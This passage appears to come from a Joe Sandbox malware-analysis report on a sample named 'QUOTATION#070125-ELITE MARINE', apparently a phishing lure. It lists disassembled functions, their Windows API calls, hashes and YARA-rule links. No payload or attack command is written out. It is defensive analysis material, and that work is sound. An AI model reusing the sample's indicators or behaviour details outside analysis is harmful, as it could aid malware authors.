                                                                            • LeaveCriticalSection.KERNEL32(0070070C,?,00648747,00702514), ref: 00650235
                                                                            • SetEvent.KERNEL32(00000000,00702514), ref: 006502C3
                                                                            • ResetEvent.KERNEL32 ref: 006502CF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CriticalEventSection$EnterLeaveReset
                                                                            • String ID:
                                                                            • API String ID: 3553466030-0
                                                                            • Opcode ID: 6d10a00fb7d6311d88f165a97877701fccf5d35b71ea54d6f70560deb6e274e5
                                                                            • Instruction ID: 24ac88b1ea608c44603fe23053803b26a15eeb877433ce6c5a0b8cb83c20ea1d
                                                                            • Opcode Fuzzy Hash: 6d10a00fb7d6311d88f165a97877701fccf5d35b71ea54d6f70560deb6e274e5
                                                                            • Instruction Fuzzy Hash: 68011671A01624DBCF049FA8FE48E657BA6FB49761B016129E90697720CE396D01CFD8
                                                                            Function 00692DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00692DC5
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00692DD6
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00692DDD
                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00692DE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: 099fa4f587d3809bab2c52c242741fb46366b7f2df92047e74628eaac5df574d
                                                                            • Instruction ID: f02b5ba77934707321c624f64f038a14f2290d9c62d5b9117c445f7e31128754
                                                                            • Opcode Fuzzy Hash: 099fa4f587d3809bab2c52c242741fb46366b7f2df92047e74628eaac5df574d
                                                                            • Instruction Fuzzy Hash: 44E092715012247BDB201B739C0DFFB7E6EEF42BB1F001016F10AD14809AA0C845D6B0
                                                                            Function 006C8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00649693
                                                                              • Part of subcall function 00649639: SelectObject.GDI32(?,00000000), ref: 006496A2
                                                                              • Part of subcall function 00649639: BeginPath.GDI32(?), ref: 006496B9
                                                                              • Part of subcall function 00649639: SelectObject.GDI32(?,00000000), ref: 006496E2
                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 006C8887
                                                                            • LineTo.GDI32(?,?,?), ref: 006C8894
                                                                            • EndPath.GDI32(?), ref: 006C88A4
                                                                            • StrokePath.GDI32(?), ref: 006C88B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 1539411459-0
                                                                            • Opcode ID: 5bf43e082fef34073d92e760a7444ee73de151e248b989de6d81b011de7167da
                                                                            • Instruction ID: 05c704fb4b5b00cf2795bf43ca3ca6009298cbd1800d64c30da032099b9ef0c3
                                                                            • Opcode Fuzzy Hash: 5bf43e082fef34073d92e760a7444ee73de151e248b989de6d81b011de7167da
                                                                            • Instruction Fuzzy Hash: 7FF0E236142258FBEB226F94AC0DFEE3F1AAF06320F448104FA01614E1CB791510CFE9
                                                                            Function 00650A9D Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00650AAF
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00650ABE
                                                                            • GetCurrentProcessId.KERNEL32 ref: 00650AC7
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00650AD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                            • String ID:
                                                                            • API String ID: 2933794660-0
                                                                            • Opcode ID: f2dc06ad299e536abca2d990f6a526fbbc638bc62d396b048f8c6158e9e7e2ef
                                                                            • Instruction ID: a0d39bb79aec4a5db659cc2ef659eeb4a79bab54893854fbb1534b966ab3d0b1
                                                                            • Opcode Fuzzy Hash: f2dc06ad299e536abca2d990f6a526fbbc638bc62d396b048f8c6158e9e7e2ef
                                                                            • Instruction Fuzzy Hash: EDF05F71C10209EBCB00DBB4D949AAEBBF8FF18215F518896E416E7150D774AB059F51
                                                                            Function 006498B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 006498CC
                                                                            • SetTextColor.GDI32(?,?), ref: 006498D6
                                                                            • SetBkMode.GDI32(?,00000001), ref: 006498E9
                                                                            • GetStockObject.GDI32(00000005), ref: 006498F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Color$ModeObjectStockText
                                                                            • String ID:
                                                                            • API String ID: 4037423528-0
                                                                            • Opcode ID: 32c31bd0ff0218bb944a626d3d0aa7146f2a1d3e3f8bdb531cee5cdc2fd64487
                                                                            • Instruction ID: 9f4d5d1cec12fd21395fc47a49b9b08e1d9189fdbb0e1cb07e701608c1798c34
                                                                            • Opcode Fuzzy Hash: 32c31bd0ff0218bb944a626d3d0aa7146f2a1d3e3f8bdb531cee5cdc2fd64487
                                                                            • Instruction Fuzzy Hash: 74E06D31644280AEDB215B79BC09FE93F62AB12336F188319F6FE981E1C77186509B21
                                                                            Function 0069162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 00691634
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,006911D9), ref: 0069163B
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006911D9), ref: 00691648
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,006911D9), ref: 0069164F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 2e8aaac753eb0215046c1e0f4d5aee37ead6dfc0f4fb8bb64ad997bd560f24f2
                                                                            • Instruction ID: bd75643a4c15d5ed1c2335197df5b4d98a3657aa0613bf31e88f03d3dc9b8539
                                                                            • Opcode Fuzzy Hash: 2e8aaac753eb0215046c1e0f4d5aee37ead6dfc0f4fb8bb64ad997bd560f24f2
                                                                            • Instruction Fuzzy Hash: 7CE08671A01211DBDB201FA0AD0DFA63B7EBF457A1F184808F249CE080D6388441C750
                                                                            Function 0068D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 0068D858
                                                                            • GetDC.USER32(00000000), ref: 0068D862
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0068D882
                                                                            • ReleaseDC.USER32(?), ref: 0068D8A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 4b1706524ba489d650c426806cd7005f23330787204b2a50c636b76303e855b7
                                                                            • Instruction ID: 9c05ea049313c0094858111e0f0e9f1ec45230009216d19dfa5fc2d4ad241ea3
                                                                            • Opcode Fuzzy Hash: 4b1706524ba489d650c426806cd7005f23330787204b2a50c636b76303e855b7
                                                                            • Instruction Fuzzy Hash: 6FE09AB5900205EFCB41AFA1D90CA7DBBB7FB48321F149459F84AE7250C7399942AF50
                                                                            Function 0068D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 0068D86C
                                                                            • GetDC.USER32(00000000), ref: 0068D876
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0068D882
                                                                            • ReleaseDC.USER32(?), ref: 0068D8A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: dbbfca5c97af3cdd59e0fcd02f9b48c1cd2da5682c88efd96902169ea9ccae61
                                                                            • Instruction ID: 83b6d7a6835927dffafc81d7f80e94a327d252fe2a75ad470fc927a9de88fecc
                                                                            • Opcode Fuzzy Hash: dbbfca5c97af3cdd59e0fcd02f9b48c1cd2da5682c88efd96902169ea9ccae61
                                                                            • Instruction Fuzzy Hash: 14E092B5D00204EFCB51AFA1D90CA6DBBB6BB48321F14A449F94AE7250CB399902AF50
                                                                            Function 006A910C Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 383COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 006A94E5
                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 006A9585
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FileName$OpenSave
                                                                            • String ID: X
                                                                            • API String ID: 3924019920-3081909835
                                                                            • Opcode ID: 7effe98f4cd421fa5150e393d96aa6ccf8b008d30418b333ffb9c23411afe9a4
                                                                            • Instruction ID: b2a3cd4d99902eec7db1e2c249be0c27da1848d12c7fcccc93e3afe255ac2019
                                                                            • Opcode Fuzzy Hash: 7effe98f4cd421fa5150e393d96aa6ccf8b008d30418b333ffb9c23411afe9a4
                                                                            • Instruction Fuzzy Hash: F9E181319083509FD764EF24C481A6AB7E2BF85314F14896DF8899B3A2DB31DD05CFA6
                                                                            Function 006A4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 006A4ED4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Connection
                                                                            • String ID: *$LPT
                                                                            • API String ID: 1722446006-3443410124
                                                                            • Opcode ID: 2e5a2911a4c78f1cda68dfd77a1594fdd7c0894ccdedbf6594dc9a8e5d374b7e
                                                                            • Instruction ID: 5c6f96432855e89d14a26d228edf7db0fb5c64c53b77264598931d1767d3567a
                                                                            • Opcode Fuzzy Hash: 2e5a2911a4c78f1cda68dfd77a1594fdd7c0894ccdedbf6594dc9a8e5d374b7e
                                                                            • Instruction Fuzzy Hash: 32914F75A002049FCB14EF58C884EAABBF2BF85314F158099E40A9F362DB75ED85CF91
                                                                            Function 006B7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(0068569E,00000000,?,006CCC08,00000000,?,00000000,00000000), ref: 006B783B
                                                                            • CharUpperBuffW.USER32(0068569E,00000000,?,006CCC08,?,00000000,00000000), ref: 006B78DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: <so
                                                                            • API String ID: 3964851224-187667226
                                                                            • Opcode ID: 169eec4cd7478811f6cf38646aea30680b2a8eb7a719400c9a451b2294b537fc
                                                                            • Instruction ID: 38e0f3a4d0208e84a91429e510dffbde00b3ffffe96a21cd4b5be3508769d9cb
                                                                            • Opcode Fuzzy Hash: 169eec4cd7478811f6cf38646aea30680b2a8eb7a719400c9a451b2294b537fc
                                                                            • Instruction Fuzzy Hash: 766116B6914128AACF44EBA4CC91DFDB37ABF54300F444129F642A7191EF20AA49DBE4
                                                                            Function 00665AA9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: JOc
                                                                            • API String ID: 0-555135532
                                                                            • Opcode ID: 10b97ecfc2500e0e5e9c86dd3e24b5e580b67f7ff861189df0c02e8f11d52eba
                                                                            • Instruction ID: 94bee166cd6ab1fdd1a557386fbe61d30c8d325c55c080ca20977b5635d54725
                                                                            • Opcode Fuzzy Hash: 10b97ecfc2500e0e5e9c86dd3e24b5e580b67f7ff861189df0c02e8f11d52eba
                                                                            • Instruction Fuzzy Hash: 0651B071D0060AAFCB109FA9C846FEE7BBAEF05310F14005DF806A7291DA319A02CB65
                                                                            Function 0064E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #
                                                                            • API String ID: 0-1885708031
                                                                            • Opcode ID: 44a68315c18e0456d0a339bf39d1177e1e7a36029e439db2593997dd37364a46
                                                                            • Instruction ID: 88bb804f98701f32d96f01f9e0246db32c64251af746e5a42a1fa9396e213473
                                                                            • Opcode Fuzzy Hash: 44a68315c18e0456d0a339bf39d1177e1e7a36029e439db2593997dd37364a46
                                                                            • Instruction Fuzzy Hash: B2513375604246DFDB14EF28C481AFA7BA7FF15310F248259E8919B3C0D6769E42CBA0
                                                                            Function 0064F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 0064F2A2
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0064F2BB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: 0c6321800fb638ee6faf9251d83d7baf9fec235ed9dc264b9f2a0593f8dc6cfc
                                                                            • Instruction ID: 88509c69fd328d3a504354e4ae5ae67ea8178fc2f1fa2d327dbdbd6232cb6b8c
                                                                            • Opcode Fuzzy Hash: 0c6321800fb638ee6faf9251d83d7baf9fec235ed9dc264b9f2a0593f8dc6cfc
                                                                            • Instruction Fuzzy Hash: A15157B14087489BD360AF10DC86BAFBBF9FF85310F81885CF1D941195EB309529CBAA
                                                                            Function 00653F4A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EncodePointer.KERNEL32(00000000,00000000,00000000,?), ref: 00653F6E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: EncodePointer
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 2118026453-2084237596
                                                                            • Opcode ID: 36f1d647756704587eaa5d7f402b8a8774f75856170594afcdb4602ae9d797c8
                                                                            • Instruction ID: fe18a41abc98ed235aa706fcedc7b19e37916431798b472900328a59c5916d92
                                                                            • Opcode Fuzzy Hash: 36f1d647756704587eaa5d7f402b8a8774f75856170594afcdb4602ae9d797c8
                                                                            • Instruction Fuzzy Hash: FE31777190022AABDF11CF94C881AEDB776FF08745F298198ED146B251C738EE98CB61
                                                                            Function 006C356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 006C3621
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006C365C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            • Opcode ID: 7db07e39c11b8ceb1e8d9b376148b9fb0c086fac5b06296b3aca3449d7dec1e3
                                                                            • Instruction ID: ecb56ef633040cd025ab9039f1c8f4ebc3fe6787c859da8d4edeb28eca46b30a
                                                                            • Opcode Fuzzy Hash: 7db07e39c11b8ceb1e8d9b376148b9fb0c086fac5b06296b3aca3449d7dec1e3
                                                                            • Instruction Fuzzy Hash: 3B317C71110204AEDB109F68D881FFB73AAEF88720F00961DF9A597280DA31AD818B64
                                                                            Function 006C4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 006C461F
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006C4634
                                                                            Strings
